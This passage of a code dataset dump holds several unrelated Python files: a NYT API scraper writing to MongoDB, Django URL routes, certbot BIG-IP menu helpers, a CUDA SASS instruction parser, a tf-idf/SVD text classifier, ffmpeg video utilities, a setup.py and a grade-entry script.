","sub_path":"KJW/Intermediate/5.Stack/Forth.py","file_name":"Forth.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158915681","text":"import os\nimport requests\nfrom pymongo import MongoClient\n\nclient = MongoClient() # Establish connection to persistent storage\ndb = client['NewYorkTimes'] # Access/Initiate Database\narticles = db['articles'] # Access/Initiate Table\n\ndef single_query(endpoint, payload):\n response = requests.get(endpoint, params=payload)\n if response.status_code != 200:\n print('WARNING', response.status_code)\n else:\n return response.json()\n\nif __name__ == '__main__':\n endpoint = 'http://api.nytimes.com/svc/search/v2/articlesearch.json'\n ny_times = os.environ['NYT_API_KEY']\n for x in range(10):\n\n payload = {'api-key': ny_times, 'page':x}\n response = single_query(endpoint, payload)\n #db.articles.insert(response)\n\n doclist = response['response']['docs']\n for doc in doclist:\n db.articles.insert(doc)\n\n print(response.keys())\n print(response.values())\n\n#Object.keys(db.articles.findOne())\n#db.articles.find({word_count: {$gt: 500}}).count()\n","sub_path":"example-api-requests/query-pymongo.py","file_name":"query-pymongo.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"392383978","text":"from django.urls import path\nfrom . 
import views\n\napp_name='accounts'\nurlpatterns = [\n\n path(\"create_account/\", views.create_account, name='create_account'),\n path(\"movements_form/\", views.movements_form, name='movements_form'),\n path(\"pay_form/\", views.pay_form, name='pay_form'),\n path('view_accounts/', views.view_accounts, name=\"view_accounts\"),\n path('account_detail//', views.account_detail, name=\"account_detail\"),#id is passed in the clicked link\n path('account_detail///confirmation/', views.sure_delete, name=\"sure_delete\"),#id is passed in the clicked link\n path('account_detail//confirmation/', views.delete_account, name=\"delete_account\"),#id is passed in the clicked link\n path('transaction_done/', views.transaction_done, name=\"transaction_done\"),\n path('account_deleted/', views.account_deleted, name=\"account_deleted\"),\n path('account_created/', views.account_created, name=\"account_created\"),\n path('pay_form//', views.edit_pay_form, name=\"edit_pay_form\"),\n path('movements_form//', views.edit_movement_form, name=\"edit_movement_form\"),\n path('bank_statement/', views.upload_file, name=\"upload_file\"),\n path('readed_successfully/', views.readed_successfully, name=\"readed_successfully\"),\n\n]","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"602279522","text":"\"\"\"Contains UI methods for F5 BIG-IP operations.\"\"\"\nimport logging\nimport os\n\nimport zope.component\n\nfrom certbot import errors\nfrom certbot import interfaces\n\nimport certbot.display.util as display_util\n\nlogger = logging.getLogger(__name__)\n\ndef select_vservers(domain, vservers):\n \"\"\"Select an appropriate F5 BIG-IP Virtual Server.\n\n :param vservers: Available F5 BIG-IP Virtual Servers\n :type vservers: :class:`list` of type `~obj.Vserver`\n\n :returns: VirtualServer or `None`\n :rtype: `~obj.Vserver` or `None`\n\n \"\"\"\n if not vservers:\n return None\n while True:\n code, tag = _vserver_menu(domain, vservers)\n if code == display_util.HELP:\n _more_info_vserver(vservers[tag])\n elif code == display_util.OK:\n return vservers[tag]\n else:\n return None\n\n\ndef _vserver_menu(domain, vservers):\n \"\"\"Select an appropriate F5 BIG-IP Virtual Server.\n\n :param vservers: Available F5 BIG-IP Virtual Servers\n :type vservers: :class:`list` of type `~obj.Vserver`\n\n :returns: Display tuple - ('code', tag')\n :rtype: `tuple`\n\n \"\"\"\n # Free characters in the line of display text (9 is for ' | ' formatting)\n free_chars = display_util.WIDTH - len(\"HTTPS\") - len(\"Enabled\") - 9\n\n if free_chars < 2:\n logger.debug(\"Display size is too small for \"\n \"certbot_bigip.display_ops._vserver_menu()\")\n # This runs the edge off the screen, but it doesn't cause an \"error\"\n filename_size = 1\n disp_name_size = 1\n else:\n # Filename is a bit more important and probably longer with 000-*\n filename_size = int(free_chars * .6)\n disp_name_size = free_chars - filename_size\n\n choices = []\n for vserver in vservers:\n if len(vserver.get_names()) == 1:\n disp_name = next(iter(vserver.get_names()))\n elif len(vserver.get_names()) == 0:\n disp_name = \"\"\n else:\n disp_name = \"Multiple Names\"\n\n choices.append(\n \"{fn:{fn_size}s} | {name:{name_size}s} | {https:5s} | \"\n \"{active:7s}\".format(\n fn=os.path.basename(vserver.filep)[:filename_size],\n name=disp_name[:disp_name_size],\n https=\"HTTPS\" if vserver.ssl else \"\",\n active=\"Enabled\" if 
vserver.enabled else \"\",\n fn_size=filename_size,\n name_size=disp_name_size)\n )\n\n try:\n code, tag = zope.component.getUtility(interfaces.IDisplay).menu(\n \"We were unable to find a virtual server with name\"\n \"{0}.{1}Which virtual server would you \"\n \"like to choose?\\n\".format(domain, os.linesep),\n choices, help_label=\"More Info\", ok_label=\"Select\")\n except errors.MissingCommandlineFlag as e:\n msg = (\"Failed to run F5 BIG-IP plugin non-interactively{1}{0}{1}\"\n \"(Login to the F5 BIG-IP devices probably failed\".format(e, os.linesep))\n raise errors.MissingCommandlineFlag(msg)\n\n return code, tag\n\ndef _more_info_vserver(vserver):\n zope.component.getUtility(interfaces.IDisplay).notification(\n \"Virtual Server Information:{0}{1}{0}{2}\".format(\n os.linesep, \"-\" * (display_util.WIDTH - 4), str(vserver)),\n height=display_util.HEIGHT)\n","sub_path":"certbot-bigip/certbot_bigip/display_ops.py","file_name":"display_ops.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167035798","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport struct\nfrom .common import *\n\nclass CuInsParser():\n '''CuInsParser will parse the instruction string to inskey, values, and modifiers.\n\n Which could be then assembled by CuInsAssembler.'''\n\n def __init__(self):\n self.m_InsAddr = 0 # ins address, needed by branch type of ins\n self.m_InsString = '' # original asm string\n self.m_CTrString = '' # constants translated asm string\n self.m_InsCode = None # instruction code\n\n self.m_InsKey = '' # key for current type of ins, eg: FFMA_R_R_R_R\n self.m_InsOp = '' # function name, such as FFMA, MOV, ...\n self.m_InsOpFull = '' # function name with modifiers\n self.m_InsPredVal = 0 # predicate value (0b****)\n self.m_InsPredStr = '' # predicate string\n self.m_InsModifier = [] # modifier dict\n self.m_InsVals = [] # array of operand values (not include labels)\n\n def dumpInfo(self):\n print('#### CuInsParser @ 0x%016x ####' % id(self))\n print('InsString: ' + self.m_InsString)\n print('CTrString: ' + self.m_CTrString)\n print('InsAddr: 0x%x' % self.m_InsAddr)\n print('InsPred: %s (%s)' % (self.m_InsPredStr, bin(self.m_InsPredVal)) )\n print('InsCode: 0x%032x' % self.m_InsCode)\n print('InsKey: ' + self.m_InsKey)\n print('InsVals: ' + intList2Str(self.m_InsVals))\n print('InsModifier: ' + str(self.m_InsModifier))\n print('\\n')\n\n def parse(self, s, addr=0, code=None):\n ''' Parse input string as instruction.'''\n\n self.m_InsString = s\n self.m_CTrString = self.__doConstTr(s)\n r = c_InsPattern.match(self.m_CTrString)\n if r is None:\n return None\n #raise ValueError(\"Unknown instruction: \" + s)\n\n self.m_InsAddr = addr\n self.m_InsCode = code\n self.m_InsPredStr = r.groups()[0]\n\n # Currently pred is treated as known format operand\n # The value will be directly computed.\n self.m_InsPredVal = self.__parsePred(self.m_InsPredStr)\n\n ins_main = r.groups()[1]\n\n # TODO: use more robust tokenizer\n tokens = re.split(', ', ins_main) # Splitting operands\n # usually ', ' will be sufficient to split the operands\n # ( ',' alone does not work for barset such as {3,4} )\n # ( space alone does not work for c[0x0] [0x0].F32 )\n # Exception: \"RET.REL.NODEC R10 0x0 ;\"\n # we will split it again, treat it as another separate operand\n ts = tokens[0].split(' ')\n ts.extend(tokens[1:])\n\n tokens = [t.strip() for t in ts]\n op_tokens = tokens[0].split('.') # Op and Op modifiers\n self.m_InsKey 
= op_tokens[0]\n self.m_InsOp = op_tokens[0]\n self.m_InsOpFull = tokens[0]\n\n self.m_InsVals = [self.m_InsPredVal]\n self.m_InsModifier = ['0_'+m for m in op_tokens] # TODO: May be we can treat pos dep modifiers here?\n\n for iop,op in enumerate(tokens[1:]):\n if len(op)==0: # ?\n continue\n\n optype, opval, opmodi = self.__parseOperand(op)\n self.m_InsKey += '_' + optype\n self.m_InsVals.extend(opval)\n self.m_InsModifier.extend([('%d_'%(iop+1))+m for m in opmodi])\n\n self.__specialTreatment() #\n\n return self.m_InsKey, self.m_InsVals, self.m_InsModifier\n\n def __doConstTr(self, s):\n '''Translate pre-defined constants (RZ/URZ/PT/...) to known or indexed values.'''\n\n for cm in c_ConstTrDict:\n s = re.sub(cm, c_ConstTrDict[cm], s)\n\n return s\n\n def __parseOperand(self, operand):\n '''Parse operand to (type, val, modi).\n\n Every operand should return with:\n type:str, val:list, modi:list'''\n\n #print('Parsing operand: ' + operand)\n\n # Every operand may have one or more modifiers\n op, modi = self.stripModifier(operand)\n\n if c_IndexedPattern.match(op) is not None:\n optype, opval, tmodi = self.__parseIndexedToken(op)\n opmodi = modi\n elif op[0] == '[': # address\n optype, opval, opmodi = self.__parseAddress(op)\n elif op[0] == '{': # BarSet such as {3,4}, only for DEPBAR (deprecated? could set in control codes)\n optype, opval, opmodi = self.__parseBarSet(op)\n elif op.startswith('c['):\n optype, opval, opmodi = self.__parseConstMemory(op)\n opmodi.extend(modi)\n elif op.startswith('0x'):\n optype = 'II'\n opval, opmodi = self.__parseIntImme(operand)\n elif c_FIType.match(operand) is not None:\n optype = 'FI'\n opval = [self.__parseFloatImme(operand)]\n opmodi = []\n else: # label type, keep as is\n optype = operand\n opval = [1]\n opmodi = []\n\n return optype, opval, opmodi\n\n def __parseIndexedToken(self, s):\n '''Parse index token such as R0, UR1, P2, UP3, B4, SB5, ...\n\n (RZ, URZ, PT should be translated In advance)'''\n\n tmain, modi = self.stripModifier(s)\n r = c_IndexedPattern.search(tmain)\n t = r.groups()[0]\n v = [int(r.groups()[1])]\n return t, v, modi\n\n def __parsePred(self, s):\n '''Parse predicates to values. 
'''\n\n if s is None or len(s)==0:\n return 7\n\n t, v, modi = self.__parseIndexedToken(s.lstrip('@'))\n if 'NOT' in modi:\n return v[0] + 8\n else:\n return v[0]\n\n def __parseFloatImme(self, s):\n '''Parse float point immediates to binary, according to the instruction precision.\n\n precision is the opcode precision, currently D/F/H for double/single(float)/half.\n NOTE: currently, +/-QNAN will be always translated to a UNIQUE binary,\n but sometimes nan could represent a set of values.\n But since it's not showed in the assembly string, there's no way to recover this value.\n '''\n\n # NEW feature: binary literal for float\n if s.startswith('0f') or s.startswith('0F'):\n v = int(s[2:], 16)\n return v\n\n f = float(s) # default to double\n\n if self.m_InsOp.startswith('F'):\n fbyte = struct.pack('f', f)\n v = struct.unpack('I', fbyte)[0]\n elif self.m_InsOp.startswith('D'):\n fbyte = struct.pack('d', f)\n v = struct.unpack('II', fbyte)[1] # for double immediates, only first 32bit is used.\n # TODO: handle endianness ???\n elif self.m_InsOp.startswith('H'):\n fbyte = struct.pack('e', f)\n v = struct.unpack('H', fbyte)[0]\n elif self.m_InsOp==\"MUFU\":\n # if '0_RCP64H' in self.m_InsModifier:\n # fbyte = struct.pack('d', f)\n # v = struct.unpack('II', fbyte)[1]\n # else:\n fbyte = struct.pack('f', f)\n v = struct.unpack('I', fbyte)[0]\n else:\n self.dumpInfo()\n raise ValueError('Unknown float precision (%s)!'% self.m_InsOp)\n\n return v\n\n def __parseIntImme(self, s):\n ''' Parse interger immediates.\n\n Positive int immediate are always kept as is,\n but negtive ints may depend on the type.\n When as arithmatic operand, it should be 32bit.\n When as address offset, it is 24bit.\n Currently we try to let the coefficient determined by the code, not predetermined.\n '''\n\n i = int(s, 16)\n\n if i>=0:\n return [i], []\n else:\n return [i], ['NegIntImme']\n\n def __parseConstMemory(self, s):\n opmain, opmodi = self.stripModifier(s)\n\n r = c_ConstMemType.match(opmain)\n if r is None:\n raise ValueError(\"Invalid constant memory operand: %s\" %s)\n\n opval = [int(r.groups()[0], 16)]\n\n atype, aval, amodi = self.__parseAddress(r.groups()[1])\n\n optype = 'c' + atype\n opval.extend(aval)\n opmodi.extend(amodi)\n\n return optype, opval, opmodi\n\n def __parseBarSet(self, s):\n '''Parse operand type Bar, such as {3,4}.\n\n This instruction is deprecated, since now every instruction\n has control codes to set barriers.'''\n\n ss = s.strip('{}').split(',')\n v = 0\n for bs in ss:\n v += 1<<(int(bs))\n\n return 'BARSET', [v], []\n\n def __parseAddress(self, s):\n '''Parse operand type Address [R0.X8+UR4+-0x8]'''\n\n ss = s.strip('[]').split('+')\n\n optype = 'A'\n opval = []\n opmodi = []\n for ts in ss:\n if '0x' in ts:\n optype += 'I'\n i_opval, i_opmodi = self.__parseIntImme(ts)\n opval.extend(i_opval)\n opmodi.extend(i_opmodi)\n else:\n ttype, tval, tmodi = self.__parseIndexedToken(ts)\n optype += ttype\n opval.extend(tval)\n opmodi.extend(tmodi)\n\n return optype, opval, opmodi\n\n def __specialTreatment(self):\n ''' Special treatments after parsing.\n\n Handle exceptions that cannot processed with current approach.\n '''\n\n if self.m_InsOp == 'PLOP3': # immLut for PLOP3 is encoded with seperating 5+3 bits\n # e.g.: 0x2a = 0b00101010 => 00101 xxxxx 010\n # LOP3 seems fine\n v = self.m_InsVals[-2]\n self.m_InsVals[-2] = (v&7) + ((v&0xf8)<<5)\n elif self.m_InsOp in ['I2F','F2I','F2F']:\n # I2F/F2I/F2F has different OpCode for 32/64,\n # but 32bit modifier may not be displayed\n if '64' in 
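What `__parseFloatImme` above computes, shown for 1.5. The `'e'` half-precision format code needs Python 3.6 or newer, and the `unpack('II')[1]` trick assumes a little-endian host, as the code's own TODO notes:

```python
import struct

# Bit patterns __parseFloatImme would produce for the immediate 1.5:
f32 = struct.unpack("I", struct.pack("f", 1.5))[0]
f16 = struct.unpack("H", struct.pack("e", 1.5))[0]
f64hi = struct.unpack("II", struct.pack("d", 1.5))[1]  # upper word only

print(hex(f32))    # 0x3fc00000, IEEE-754 single
print(hex(f16))    # 0x3e00, IEEE-754 half
print(hex(f64hi))  # 0x3ff80000, upper 32 bits of the double
```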
self.m_InsOpFull:\n self.m_InsModifier.append('0_CVT64')\n elif self.m_InsOp in c_AddrFuncs: # Functions that use address of current instruction\n if self.m_InsKey.endswith('_II'):\n if self.m_InsOp in ['CALL', 'RET'] and 'ABS' in self.m_InsOpFull:\n pass\n else:\n # TODO: eliminate the hardcode for negative address offset\n addr = self.m_InsVals[-1] - self.m_InsAddr - 0x10\n if addr<0:\n addr = 2**50 + addr\n self.m_InsVals[-1] = addr\n\n if self.m_InsOp in c_PosDepFuncs:\n # the modifier of I2I/F2F is position dependent\n # eg: F2F.F32.F64 vs F2F.F64.F32\n # TODO: find all instructions with position dependent modifiers\n for i,m in enumerate(self.m_InsModifier):\n if m.startswith('0_'):\n self.m_InsModifier[i] += '@%d'%i\n\n def stripModifier(self, s):\n '''Split the token to three parts\n\n preModifier([~-|!]), opmain, postModifier(.FTZ, .X16, ...) '''\n\n r = c_ModifierPattern.match(s) # split token to three parts\n\n if r is None:\n raise ValueError(\"Unknown token %s\" % s)\n else:\n pre = r.groups()[0]\n post = r.groups()[2]\n\n opmain = r.groups()[1]\n opmodi = []\n\n for c in pre:\n opmodi.append(c_OpPreModifierChar[c])\n\n for c in post.split('.'):\n if len(c)==0:\n continue\n opmodi.append(c)\n\n return opmain, opmodi\n\n @staticmethod\n def transAddr2Label(s):\n pass\n","sub_path":"CuAsm/CuInsParser.py","file_name":"CuInsParser.py","file_ext":"py","file_size_in_byte":11706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"469564917","text":"\"\"\"\n * @author raj\n * @create date 2019-09-10 11:45:56\n * @modify date 2019-10-15 11:58:06\n * @desc tf-idf, SVD and GuassianNB() to classify text documents\n\"\"\"\n\n\n\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport os\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import PorterStemmer\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\n\n\n\ndef removeStopWords(content):\n\tstopWords = set(stopwords.words('english'))\n\twordTokens = word_tokenize(content)\n\tfilteredContent = [word for word in wordTokens if not word in stopWords]\n\tfilteredContent = []\n\tfor word in wordTokens:\n\t\tif word not in stopWords:\n\t\t\tfilteredContent.append(word)\n\tfinalContent = \"\"\n\tfor word in filteredContent:\n\t\tfinalContent += word + \" \"\n\treturn finalContent\n\n\ndef removeStemming(content):\n\tposterStemmer = PorterStemmer()\n\twordList = word_tokenize(content)\n\tresultContent = \"\"\n\tfor word in wordList:\n\t\tresultContent += posterStemmer.stem(word) + \" \"\n\t\n\treturn resultContent\n\ndef removeDigits(inputString):\n\tresultString = ''.join([i for i in inputString if not i.isdigit()])\n\treturn resultString\n\n\ndef removePunctuations(content):\n\ttokenizer = RegexpTokenizer(r'\\w+')\n\ttokenizedContent = tokenizer.tokenize(content)\n\tfinalContent = \"\"\n\tfor word in tokenizedContent:\n\t\tfinalContent += word + \" \"\n\treturn finalContent\n\n\n\n\ndef preProcessData(content):\n\tcontent = removeStopWords(content)\n\tcontent = removeStemming(content)\n\tcontent = removeDigits(content)\n\tcontent = removePunctuations(content)\n\treturn content\n\ncorups = []\nlabeledData = []\n\ndef processForDir(directoryPath):\n\t\n\tfor (root, dirs, files) in os.walk(directoryPath):\n\t\tfor file in 
files:\n\n\t\t\twith open(directoryPath+'/'+file, 'rb') as fileInput:\n\n\t\t\t\tcontent = fileInput.read().decode(errors='replace')\n\t\t\t\tcontent = preProcessData(content.lower())\n\n\t\t\t\tcorups.append(content)\n\n\t\t\t\t# now labeling with filename\n\t\t\t\tlabeledData.append(directoryPath.replace('../bbcsport/',''))\n\n\nprocessForDir('../bbcsport/athletics')\nprocessForDir('../bbcsport/cricket')\nprocessForDir('../bbcsport/rugby')\nprocessForDir('../bbcsport/tennis')\nprocessForDir('../bbcsport/football')\n\nvectorizer = TfidfVectorizer()\nfinal_vectorizer = vectorizer.fit_transform(corups)\nfinal_vectorizer_array = final_vectorizer.toarray() \nprint(final_vectorizer_array.shape)\n\nX_train, X_test, Y_train, Y_test = train_test_split(final_vectorizer_array, labeledData, test_size = 0.2, random_state = 5)\n\nu,s,v = np.linalg.svd(X_train.T)\nprint(u.shape)\nprint(s.shape)\nprint(v.shape)\nq,w = v.shape\n\ncountt = 0\nbest = -1\nbest_at = 0\nx_axis = []\ny_axis = []\nfor countt in range(1,q):\n\tnumber = countt\n\t# number = 100\n\t# number = int(input())\n\tprint(\"component size\", number)\n\n\tU = u[:,:number]\n\tV = v[:number, :]\n\tprint(U.shape)\n\tprint(V.shape)\n\n\tX_train_svd = V.T\n\tY_train_svd = Y_train\n\n\t# Predict on truncated by library\n\tclassifier = GaussianNB()\n\tclassifier.fit(X_train_svd, Y_train_svd)\n\tX_test_svd = np.matmul(X_test, U)\n\tY_test_svd = Y_test\n\tY_predict = classifier.predict(X_test_svd)\n\n\t# print('\\n\\nusing TruncatedSVD()')\n\t# print(confusion_matrix(Y_test_svd, Y_predict))\n\tcurrent_score = accuracy_score(Y_test_svd, Y_predict)\n\tos.system(\"clear\")\n\tprint(current_score)\n\tx_axis.append(number)\n\ty_axis.append(current_score)\n\tif best < current_score:\n\t\tbest = current_score\n\t\tbest_at = number\n\nimport matplotlib.pyplot as plt\nplt.plot(x_axis, y_axis)\nplt.xlabel('no of components')\nplt.ylabel('accuracy')\nplt.title('Accurcay Graph')\nplt.show()\nprint('Max accuracy achieved at', best_at, 'accuracy', best)","sub_path":"practical6/pr6.py","file_name":"pr6.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"81608218","text":"import os\nfrom base.os_base import handle_dir, copy_file, listdir\nfrom utils.image_utils import batch_cv2_resize_images, batch_matlab_resize_images, batch_shift_images\n\n\ndef batch_matlab_resize_videos(ori_root, dest_root, scale=1.0, method='bicubic', filename_template=\"{}.png\"):\n '''\n function:\n resizing videos in batches, same as matlab2017 imresize\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n scale: float, the resize scale\n method: string, the interpolation method,\n optional: 'bilinear', 'bicubic'\n default: 'bicubic'\n filename_template: string, the filename template for saving images\n '''\n handle_dir(dest_root)\n videos = listdir(ori_root)\n for v in videos:\n batch_matlab_resize_images(\n ori_root=os.path.join(ori_root, v),\n dest_root=os.path.join(dest_root, v),\n scale=scale,\n method=method,\n filename_template=filename_template\n )\n print(\"Video\", v, \"resize done !\")\n\n\ndef batch_cv2_resize_videos(ori_root, dest_root, scale=1.0, method='bicubic', filename_template=\"{}.png\"):\n '''\n function:\n resizing videos in batches\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n scale: float, the resize scale\n 
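The component sweep above re-slices a full SVD and refits `GaussianNB` for every k, projecting the test split with `np.matmul(X_test, U)`. The commented-out hints in the loop point at the equivalent scikit-learn route; a sketch:

```python
from sklearn.decomposition import TruncatedSVD
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score

# Equivalent projection with TruncatedSVD: fit the decomposition on the
# training matrix only, then reuse it to project the test split.
def score_with_k_components(k, X_train, X_test, Y_train, Y_test):
    svd = TruncatedSVD(n_components=k, random_state=5)
    Xtr = svd.fit_transform(X_train)   # replaces the manual u/s/v slicing
    Xte = svd.transform(X_test)        # replaces np.matmul(X_test, U)
    clf = GaussianNB().fit(Xtr, Y_train)
    return accuracy_score(Y_test, clf.predict(Xte))
```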
method: string, the interpolation method,\n optional: 'nearest', 'bilinear', 'bicubic'\n default: 'bicubic'\n filename_template: string, the filename template for saving images\n '''\n handle_dir(dest_root)\n videos = listdir(ori_root)\n for v in videos:\n batch_cv2_resize_images(\n ori_root=os.path.join(ori_root, v),\n dest_root=os.path.join(dest_root, v),\n scale=scale,\n method=method,\n filename_template=filename_template\n )\n print(\"Video\", v, \"resize done !\")\n\n\ndef batch_shift_videos(ori_root, dest_root, offset_x=0., offset_y=0., filename_template=\"{}.png\"):\n '''\n function:\n shifting videos by (offset_x, offset_y) on (axis-x, axis-y) in batches\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n offset_x: float, offset pixels on axis-x\n positive=left; negative=right\n offset_y: float, offset pixels on axis-y\n positive=up; negative=down\n filename_template: string, the filename template for saving images\n '''\n handle_dir(dest_root)\n videos = listdir(ori_root)\n for v in videos:\n batch_shift_images(\n ori_root=os.path.join(ori_root, v),\n dest_root=os.path.join(dest_root, v),\n offset_x=offset_x,\n offset_y=offset_y,\n filename_template=filename_template\n )\n print(\"Video\", v, \"shift done !\")\n\n\ndef extra_frames_from_videos(ori_root, save_root, fname_template='%4d.png', start_end=None):\n '''\n function:\n ext frames from videos\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n fname_template: the template for frames' filename\n start_end: list, len=2, the start and end index for processed videos,\n assert: len(start_end)=2\n default: None, that is processing all videos\n '''\n\n handle_dir(save_root)\n\n videos = sorted(listdir(ori_root))\n if start_end is not None:\n assert len(start_end) == 2, \"only support len(start_end)=2\"\n videos = videos[start_end[0]:start_end[1]]\n\n for v in videos:\n vn = v[:-(len(v.split('.')[-1]) + 1)]\n video_path = os.path.join(ori_root, v)\n png_dir = os.path.join(save_root, vn)\n png_path = os.path.join(png_dir, fname_template)\n handle_dir(png_dir)\n command = 'ffmpeg -i {} {}'.format(video_path, png_path)\n os.system(command)\n print(\"Extra frames from {}\".format(video_path))\n\n\ndef zip_frames_to_videos(ori_root, save_root, fname_template='%4d.png', video_ext='mp4', start_end=None):\n '''\n function:\n zip frames to videos\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n fname_template: the template of frames' filename\n start_end: list, len=2, the start and end index for processed videos,\n assert: len(start_end)=2\n default: None, that is processing all videos\n '''\n handle_dir(save_root)\n\n videos_name = sorted(listdir(ori_root))\n if start_end is not None:\n assert len(start_end) == 2, \"only support len(start_end)=2\"\n videos_name = videos_name[start_end[0]:start_end[1]]\n\n for vn in videos_name:\n imgs_path = os.path.join(ori_root, vn, fname_template)\n video_path = os.path.join(save_root, '{}.{}'.format(vn, video_ext))\n command = 'ffmpeg -i {} -vcodec libx264 -crf 16 -pix_fmt yuv420p {}'.format(imgs_path, video_path)\n # command = 'ffmpeg -r 24000/1001 -i {} -vcodec libx265 -pix_fmt yuv422p -crf 10 {}'.format(\n # imgs_path, video_path) # youku competition\n os.system(command)\n print(\"Zip frames to {}\".format(video_path))\n\n\ndef copy_frames_for_fps(ori_root, 
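The ffmpeg wrappers above interpolate paths into shell strings for `os.system`, which breaks on paths containing spaces. A hedged sketch of the extraction call with `subprocess` and an argument list:

```python
import subprocess

# Same ffmpeg extraction call as extra_frames_from_videos above, but with
# an argument list, so paths with spaces survive intact.
def extract_frames(video_path, png_path_template):
    cmd = ["ffmpeg", "-i", video_path, png_path_template]
    subprocess.run(cmd, check=True)  # raises CalledProcessError on failure

# extract_frames("in/clip 01.mp4", "out/clip01/%4d.png")
```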
\ndef copy_frames_for_fps(ori_root, save_root, mul=12, fname_template=\"{:0>4}\", ext=\"png\"):\n    '''\n    function:\n        duplicate each frame mul times, e.g. to raise a video's frame rate\n    params:\n        ori_root: string, the dir of videos that need to be processed\n        save_root: string, the dir to save processed videos\n        mul: how many copies to make of each frame\n        fname_template: the template of frames' filename\n        ext: the ext of frames' filename\n    '''\n    fname_template = fname_template + '.{}'\n    videos_name = sorted(listdir(ori_root))\n    handle_dir(save_root)\n    for vn in videos_name:\n        frames = sorted(listdir(os.path.join(ori_root, vn)))\n        handle_dir(os.path.join(save_root, vn))\n        for i, f in enumerate(frames):\n            for j in range(mul):\n                now_idx = i * mul + j\n                src = os.path.join(ori_root, vn, f)\n                dest = os.path.join(save_root, vn, fname_template.format(now_idx, ext))\n                copy_file(src, dest)\n","sub_path":"utils/video_utils.py","file_name":"video_utils.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"519706331","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom pinboard import metadata\n\ntry:\n    from setuptools import setup\nexcept ImportError:\n    from distutils.core import setup\n\nwith open(os.path.join(os.path.dirname(__file__), \"README.rst\")) as file:\n    long_description = file.read()\n\nclassifiers = [\n    \"Development Status :: 5 - Production/Stable\",\n    \"Environment :: Console\",\n    \"Intended Audience :: Developers\",\n    \"Natural Language :: English\",\n    \"Operating System :: OS Independent\",\n    \"Programming Language :: Python\",\n    \"Topic :: Software Development :: Libraries :: Python Modules\",\n    \"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: CGI Tools/Libraries\",\n    \"Topic :: Utilities\",\n    \"License :: OSI Approved :: Apache Software License\",\n]\n\nsetup(\n    name='pinboard',\n    version=metadata.__version__,\n    url=\"http://github.com/lionheart/pinboard.py\",\n    long_description=long_description,\n    description=\"A Python wrapper for Pinboard.in\",\n    classifiers=classifiers,\n    keywords=\"pinboard\",\n    license=metadata.__license__,\n    author=metadata.__author__,\n    author_email=metadata.__email__,\n    packages=['pinboard'],\n    package_data={'': ['LICENSE', 'README.rst']},\n    # scripts=['scripts/pinboard']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"494314924","text":"dados = []\nresp = ' '\nperg = 0\nwhile True:\n    dados.append(str(input('Name: ')))\n    dados.append(float(input('Grade 1: ')))\n    dados.append(float(input('Grade 2: ')))\n    print('-=-'*12)\n    resp = str(input('Want to continue [Y/N]? ')).upper().strip()\n    if resp == 'N':\n        break\nprint(f'{\"Code\":<4} {\"Name\":<10} {\"Average\":>8} ')\nfor c in range(0, len(dados), 3):\n    print(f'{c:<4} {dados[c]:<10} {(dados[c+1]+dados[c+2])/2:>8.1f}')\nprint('-=-'*12)\nwhile perg != 999:\n    print('\\033[31mNOTE\\033[m -> Enter 999 to stop!!')\n    print('-=-'*12)\n    perg = int(input('Show grades for which student? '))\n    print('-=-'*12)\n    if perg == 999:\n        break\n    else:\n        for c in range(0, len(dados), 3):\n            if perg == c:\n                print(f'Student: \\033[34m{dados[c]}\\033[m, grades: \\033[34m[{dados[c+1]}] [{dados[c+2]}]\\033[m')\n                print('-=-'*12)\nprint('End of program.')\n","sub_path":"desafios/desafio89.py","file_name":"desafio89.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
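# A minimal sketch (not part of the original exercise). The grade-book script above
# keeps name, grade 1 and grade 2 flattened into one list and walks it with
# range(0, len(dados), 3); one (name, grade1, grade2) tuple per student makes the
# lookup by code direct. The entries below are made up.
students = [('Ana', 8.0, 6.0), ('Bruno', 5.5, 7.5)]
for code, (name, g1, g2) in enumerate(students):
    print(f'{code:<4} {name:<10} {(g1 + g2) / 2:>8.1f}')
# a student's whole record is then students[code] instead of three list slots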
